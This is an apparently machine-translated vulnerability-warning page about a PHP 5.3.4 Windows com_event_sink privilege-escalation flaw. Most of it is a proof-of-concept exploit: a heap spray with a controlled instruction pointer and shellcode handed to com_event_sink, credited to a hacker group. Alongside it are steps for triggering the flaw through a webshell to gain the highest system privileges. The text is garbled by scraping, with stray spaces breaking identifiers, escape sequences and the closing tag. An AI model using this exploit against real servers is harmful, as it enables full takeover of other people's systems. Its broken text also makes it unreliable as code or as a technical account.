PHP 5.3.4(WIN) COM_SINK elevation of privilege vulnerability-vulnerability warning-the black bar safety net

ID MYHACK58:62201235450
Type myhack58
Reporter 佚名
Modified 2012-11-08T00:00:00


PHP the latest version has been updated to 5. 4. x, but China is still in the in the 5. 2. x and 5. 3. x-replacement phase. There is a vulnerability of the php present in the 5. 3. x version

The test method is as follows: cmd /c x:\php\php.exe x:\test.php

Download php app to a local, then use php. exe parsing php. Webshell above using php's exec function, or executed using Wscript. shell called cmd. exe and then /c x:\php\php.exe x:\xxxx\test.php Here are two test shots:

! 1. png

To successfully exploit this vulnerability the attacker will obtain the system highest authority

! 0.jpg

On the vulnerability analysis later attached. Here is the PoC code:

<? php //PHP 5.3.4(Win Edition) com_event_sink()model privilege escalation vulnerability //$eip ="\x44\x43\x42\x41"; $eip= "\x4b\xe8\x57\x78"; $eax ="\x80\x01\x8d\x04"; $deodrant=""; $axespray = str_repeat($eip.$ eax,0x80); //048d0190 echo strlen($axespray); echo "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n"; echo "Silic Group Hacker Army - BlackBap.Org"; //1 9 2 0 0 ==4B32 4b00 for($axeeffect=0;$axeeffect<0x4B32;$axeeffect++){$deodrant.=$ axespray;} $terminate = "T"; $u[] =$deodrant; $r[] =$deodrant.$ terminate; $a[] =$deodrant.$ terminate; $s[] =$deodrant.$ terminate; //$vVar = new VARIANT(0x048d0038+$offset); here is controllable can be modified $vVar = new VARIANT(0x048d0000+1 8 0); //Pop code(Shellcode) $buffer = "\x90\x90\x90"."\ xB9\x38\xDD\x82\x7C\x33\xC0\xBB"."\ xD8\x0A\x86\x7C\x51\x50\xFF\xd3"; $var2 = new VARIANT(0x41414242); com_event_sink($vVar,$var2,$buffer); ?& gt;